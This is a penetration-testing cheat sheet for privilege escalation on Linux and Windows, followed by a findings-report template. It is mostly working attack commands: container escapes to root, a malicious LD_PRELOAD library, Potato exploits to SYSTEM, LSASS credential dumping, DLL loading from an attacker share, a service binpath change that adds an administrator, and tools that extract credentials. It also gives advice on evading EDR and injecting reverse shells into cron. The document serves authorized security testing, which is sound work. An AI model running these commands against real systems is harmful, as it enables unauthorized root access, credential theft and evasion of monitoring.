🛡️ Methodology Checklist
- Run automated tool first: LinPEAS (Linux) / WinPEAS (Windows)
- Linux: sudo -l → SUID → cron → capabilities → groups → kernel
- Windows: whoami /priv → token abuse → group privileges → weak perms → UAC
- Credential hunt on both platforms before kernel exploits
- Use GTFOBins (Linux) and LOLBAS (Windows) for binary abuse
- Document full escalation path before proceeding to next phase
🎯 Operational Context
Use when: Shell obtained on any OS — master reference for privilege escalation enumeration and exploitation commands for Linux and Windows.
Think Dumber First: Two commands, always first: sudo -l (Linux) / whoami /priv (Windows). These two cover the highest-yield privesc paths in 10 seconds.
Skip when: N/A — master reference document.
⚡ Tactical Cheatsheet
Linux — Enumeration
| Command | Tactical Outcome |
|---|---|
./linpeas.sh | tee linpeas.out | LinPEAS — full automated enumeration |
uname -a; cat /etc/os-release | OS/kernel version |
id; whoami; groups | Current user context |
sudo -l | Sudo rights — check every binary against GTFOBins |
find / -perm -4000 -type f 2>/dev/null | SUID binaries |
find / -perm -2000 -type f 2>/dev/null | SGID binaries |
getcap -r / 2>/dev/null | Linux capabilities |
Linux — Quick-Win Attacks
| Command | Tactical Outcome |
|---|---|
sudo [GTFOBins_BINARY] | Abuse sudo right → shell |
[SUID_BINARY] | Exploit SUID binary (check GTFOBins) |
cat /etc/crontab; ls /etc/cron.* | Cron jobs — look for writable scripts |
cat /etc/exports | NFS — check for no_root_squash |
ls -al /tmp/.ICE-unix/ /tmp/tmux-* | Tmux socket hijack |
python3 -c "import pty; pty.spawn('/bin/bash')" | Upgrade to PTY |
Linux — Group & Capability Abuse
| Command | Tactical Outcome |
|---|---|
docker run -v /:/mnt --rm -it alpine chroot /mnt sh | Docker group → root |
lxc init ubuntu:18.04 privesc -c security.privileged=true | LXD group → privileged container |
debugfs /dev/sda1 | Disk group → raw filesystem access |
python3 -c "import os; os.setuid(0); os.system('/bin/bash')" | cap_setuid exploit |
Linux — LD_PRELOAD & Library Hijack
| Command | Tactical Outcome |
|---|---|
sudo -l | grep env_keep | Check for LD_PRELOAD preservation |
gcc -fPIC -shared -o /tmp/preload.so preload.c -nostartfiles | Compile malicious .so |
sudo LD_PRELOAD=/tmp/preload.so [SUDO_BINARY] | Inject via sudo |
readelf -d [SUID_BINARY] | grep RUNPATH | Check RUNPATH for hijack |
Windows — Token Privileges
| Command | Tactical Outcome |
|---|---|
whoami /priv | List all token privileges |
whoami /groups | List group memberships |
systeminfo | findstr /B /C:"OS" | OS version and build number |
.\JuicyPotato.exe -l [PORT] -p cmd.exe -t * -c [CLSID] | SeImpersonate → SYSTEM (build ≤1809) |
.\PrintSpoofer.exe -i -c cmd | SeImpersonate → SYSTEM (build ≥1809) |
.\GodPotato.exe -cmd "cmd /c whoami" | SeImpersonate → SYSTEM (any modern build) |
procdump.exe -accepteula -ma lsass.exe lsass.dmp | SeDebugPrivilege → LSASS dump |
takeown /f [FILE]; icacls [FILE] /grant [USER]:F | SeTakeOwnershipPrivilege |
Windows — Group Privilege Abuse
| Command | Tactical Outcome |
|---|---|
reg query HKLM\...\Policies\System /v ConsentPromptBehaviorAdmin | Check UAC level |
dnscmd [DC] /serverlevelplugindll \\[LHOST]\share\evil.dll | DnsAdmins → DLL injection |
sc config [SERVICE] binpath= "cmd /c net localgroup administrators [USER] /add" | Server Operators → service abuse |
wevtutil qe Security /c:1000 /rd:true /f:text | findstr /i "pass" | Event Log Readers → mine creds |
Windows — Weak Permissions
| Command | Tactical Outcome |
|---|---|
.\SharpUp.exe audit | Automated weak permission audit |
icacls [SERVICE_BINARY_PATH] | Check service binary ACL |
sc qc [SERVICE] | Query service binary path |
copy /Y [MALICIOUS].exe [SERVICE_BINARY_PATH] | Overwrite vulnerable binary |
wmic service get name,pathname | findstr /i "auto" | findstr /iv "c:\\windows" | Find unquoted service paths |
accesschk.exe -kvuqsw HKLM\SYSTEM\CurrentControlSet\Services | Writable service registry keys |
Windows — Credential Hunting
| Command | Tactical Outcome |
|---|---|
findstr /SIM /C:"password" *.txt *.xml *.ini *.config 2>nul | File-based cred search |
(Get-PSReadLineOption).HistorySavePath | PowerShell command history path |
cmdkey /list | Stored Windows Credential Manager entries |
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" | Autologon credentials |
.\lazagne.exe all | LaZagne — automated credential extraction |
keepass2john database.kdbx > hash.txt | KeePass hash for cracking |
Windows — Automated Tools
| Command | Tactical Outcome |
|---|---|
.\winpeas.exe > winpeas.txt | WinPEAS — full automated audit (red+yellow = critical) |
.\Seatbelt.exe -group=user | Seatbelt user-context checks |
.\Seatbelt.exe -group=system | Seatbelt system-level checks |
Invoke-AllChecks | PowerUp — service/registry vulnerability scan |
.\Watson.exe | Missing patches → local privilege escalation |
OS Build → Potato Selector
| OS Build | OS Version | Potato |
|---|---|---|
| ≤ 1803 | Server 2016 / Win 10 (old) | JuicyPotato |
| 1809–19H1 | Server 2019 / Win 10 | PrintSpoofer |
| ≥ 19H2 | Server 2019+ / Win 11 | GodPotato / PrintSpoofer |
| Any | Any (with SeImpersonate) | GodPotato (most universal) |
🔬 Deep Dive & Workflow
Linux PrivEsc Decision Tree
1. sudo -l → GTFOBins hit? → exploit
2. SUID binaries → GTFOBins hit? → exploit
3. id → docker/lxd/disk group? → container escape / debugfs
4. cron writable script? → inject reverse shell
5. LD_PRELOAD env_keep in sudo? → .so injection
6. NFS no_root_squash? → SUID binary on mount
7. Capabilities? → cap_setuid python3 exploit
8. Logrotate writable log? → logrotten
9. Kernel exploit (last resort — compile natively on target)
Windows PrivEsc Decision Tree
1. whoami /priv → SeImpersonate/SeAssignPrimary? → Potato
2. whoami /priv → SeDebugPrivilege? → LSASS dump
3. whoami /priv → SeTakeOwnership? → file hijack
4. whoami /groups → Backup Operators? → SAM/NTDS dump
5. whoami /groups → DnsAdmins? → DLL injection
6. whoami /groups → Server Operators? → service binpath abuse
7. SharpUp → service binary writable? → overwrite
8. SharpUp → unquoted path? → plant binary
9. SharpUp → registry key writable? → ImagePath hijack
10. AlwaysInstallElevated (both regs = 1)? → MSI payload
11. UAC + Admins group? → fodhelper / srrstr bypass
12. Credential hunt → runas /savecred
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| LinPEAS/WinPEAS not running | AV or download blocked | Fall back to manual commands in this cheatsheet; manual checks cover 80% of what automation finds |
| Privesc found but requires reboot | Cannot wait for reboot | Note finding; pursue other paths; schedule reboot if possible (may trigger monitoring) |
| Multiple privesc paths | Unsure which to use | Choose lowest-noise path first; kernel exploits last (crash risk); service abuse before exploit |
| Privesc requires compilation | No compiler on target | Compile on matching-arch attack box; transfer binary; ensure static compilation if possible |
| PrivEsc path exists but blocked by monitoring | EDR detecting | Use LOL techniques; document the path even if not exploitable — still a finding |
📝 Reporting Trigger
Finding Title: Privilege Escalation Achieved — SYSTEM/Root Access Obtained Impact: Full operating system access achieved via privilege escalation enables credential harvesting, persistence installation, lateral movement preparation, and complete control over the compromised host and all data it processes. Root Cause: System hardening deficiencies including misconfigured permissions, SUID binaries, weak sudo rules, or unpatched privilege escalation vulnerabilities. Recommendation: Apply OS hardening benchmarks (CIS). Regularly run privilege escalation enumeration scripts against all systems. Patch known privilege escalation CVEs within SLA. Implement host-based monitoring for privilege escalation indicators.